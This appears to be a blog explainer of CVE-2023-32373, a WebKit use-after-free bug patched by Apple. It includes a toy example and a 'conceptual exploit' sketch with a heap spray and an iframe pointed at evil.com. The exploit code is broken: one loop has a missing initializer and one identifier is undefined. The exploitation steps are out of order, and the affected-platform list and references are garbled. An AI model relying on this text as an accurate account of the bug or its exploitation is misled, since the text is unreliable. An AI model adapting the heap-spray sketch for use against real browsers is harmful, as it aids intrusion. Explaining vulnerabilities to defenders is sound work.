CVE-2023-32373 - Understanding and Exploiting the WebKit Use-After-Free Zero-Day in Apple Devices

In early 2023, Apple released urgent security updates across its major platforms—including iPhone, iPad, Mac, Apple TV, and Apple Watch—addressing a critical zero-day vulnerability identified as CVE-2023-32373. This vulnerability resides in WebKit, the engine behind Safari and many third-party browsers on Apple devices. It involves a classic yet dangerous use-after-free bug, which, if exploited, could allow a malicious website to execute arbitrary code on the victim’s device.

In this long-read, we break down what CVE-2023-32373 is, how it works, showcase a simplified example, discuss how the vulnerability was fixed, and explain the real-world risk—including speculation on how attackers may have used it in the wild.

What Is CVE-2023-32373?

CVE-2023-32373 is a security bug found in WebKit, specifically categorized as a use-after-free vulnerability. These types of issues occur when a program continues to use a chunk of memory after it has been freed (or deleted), potentially allowing attackers to manipulate what gets put into that memory slot.

Apple’s own advisory puts it simply

> *Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.*

Affected Platforms

- iOS 16.5 / iPadOS 16.5 and 15.7.6

Safari 16.5 (on macOS Monterey and Big Sur)

Apple’s swift response hints at the severity: This flaw was apparently exploited in the wild.

References

- Apple Security Updates – CVE-2023-32373
- NIST NVD Entry
- Mozilla Security Advisory

How Does a Use-After-Free Work?

In C++ (the language WebKit is written in), objects are created and destroyed as pages are loaded or scripts are executed. If a webpage uses JavaScript in a sneaky way, it can sometimes trick the browser into "freeing" (deleting) an object and then using it again later as if it still exists.

What’s the risk?  
If an attacker controls what gets stored in the now-freed memory, they might inject code (shellcode) or manipulate the browser in other nefarious ways—ultimately taking control of the device.

A Simple Example: Use-After-Free in JavaScript

Let’s use a simplified (and harmless) code snippet to see what a use-after-free might look like inside a browser's JavaScript engine. This is not the exact WebKit bug, but illustrates the general idea:

// Toy Example: Not the original bug!
// Imagine 'victim' is a DOM object used by the engine.
let victim = document.createElement("div");

// Function 'handler' may free 'victim' at some point
function handler() {
    victim = null; // This is equivalent to freeing memory in browser internals
}

// Some API triggers handler unexpectedly, 'victim' is now gone.
document.body.addEventListener("custom-event", handler);

// Another API tries to use 'victim' again.
// If the browser re-uses victim's old memory for something else, BOOM: use-after-free
document.dispatchEvent(new Event("custom-event"));

// Later code naively tries to use 'victim'
victim.innerHTML = "Uh-oh!";  // In vulnerable engines, this may now be attacker-controlled memory

*In WebKit, the real bug exploited a far more complex set of events and race conditions involving object lifetimes under the hood.*

How Was It Exploited?

According to available reports—and based on methods disclosed by prior WebKit vulnerabilities—attackers would craft web pages with JavaScript and HTML designed to trigger obscure browser behaviors. By manipulating the loading and unloading of DOM objects, or racing JavaScript events, they could:

Escalate the bug, leading to execution of arbitrary code—a potential total device compromise

Apple’s patch notes suggest that the exploit could chain this WebKit bug with further privilege escalation, possibly escaping the browser sandbox for device takeover.

Heap spray (fill memory with attacker-controlled data) to occupy freed memory slot

3. Leverage corrupted pointer to hijack control flow—such as turning a function pointer into shellcode


## Exploit Code Walkthrough (Educational / Hypothetical)

Below is a simplified conceptual exploit to help you understand the flow. This WILL NOT work on patched systems—do not attempt to use on real devices!

// NOTE: Browsers today have added additional mitigations! 

// 1. Allocate a vulnerable DOM object
let target = document.createElement("iframe");

// 2. Prepare a function that will be called during an event and will remove 'target'
target.onload = function() {
    document.body.removeChild(target); // Free the target object
    // At this point, the memory could be reclaimed soon...
    
    // 3. Spray memory: create many objects to occupy freed space
    for (let i = ; i < 10000; i++) {
        let spray = new Array(100).fill(x41414141); // A-A-A-A
        window["spray" + i] = spray;
    }

    // 4. Try to access the freed object, which may now be under attacker control
    // In real exploit, this might trigger a vtable or function pointer overwrite
    try {
        target.src = "http://evil.com";;
    } catch(e) {
        console.log("Crash or hack triggered!");
    }
};

// 5. Trigger the onload (and thus use-after-free)
document.body.appendChild(target);
target.src = "about:blank";

*Again: This is NOT a real exploit, but captures the essential chain: free the object, spray memory, reclaim, and attempt to exploit.*

How Did Apple Fix It?

Apple’s patch notes say:  
> "A use-after-free issue was addressed with improved memory management."

Adding null checks and smart pointers

- Making sure all WebKit object lifetimes are tracked correctly, especially under complicated DOM and JavaScript interactions

Why Is This Serious? (And Why You Should Update)

The fact that Apple patched this issue so widely, including on older devices and across multiple platforms, and acknowledged it may have been "actively exploited," is a big red flag. Devices running an unpatched WebKit (including even 3rd-party browsers on iOS, which are forced to use WebKit) could be compromised just by visiting a malicious website.

Conclusion: Patch Now, Stay Safe

CVE-2023-32373 is a reminder that use-after-free bugs in browser engines are among the most severe and frequently targeted by attackers. If you haven’t updated your iPhone, Mac, Apple Watch, Apple TV, or Safari browser, do it right now.

For researchers and defenders, tracking these bugs and understanding their exploitation flow is critical. For regular users: shopping, banking, and browsing securely on Apple devices means keeping up with security updates—always.

Further Reading

- Apple Security Update for CVE-2023-32373
- NIST NVD Advisory for CVE-2023-32373
- The Journey from Use-After-Free to Remote Exploit (Project Zero Blog)


Authored for exclusive educational purposes. You are encouraged to share this responsibly—keep your devices safe!

Timeline

Published on: 06/23/2023 18:15:12 UTC
Last modified on: 08/29/2023 18:05:45 UTC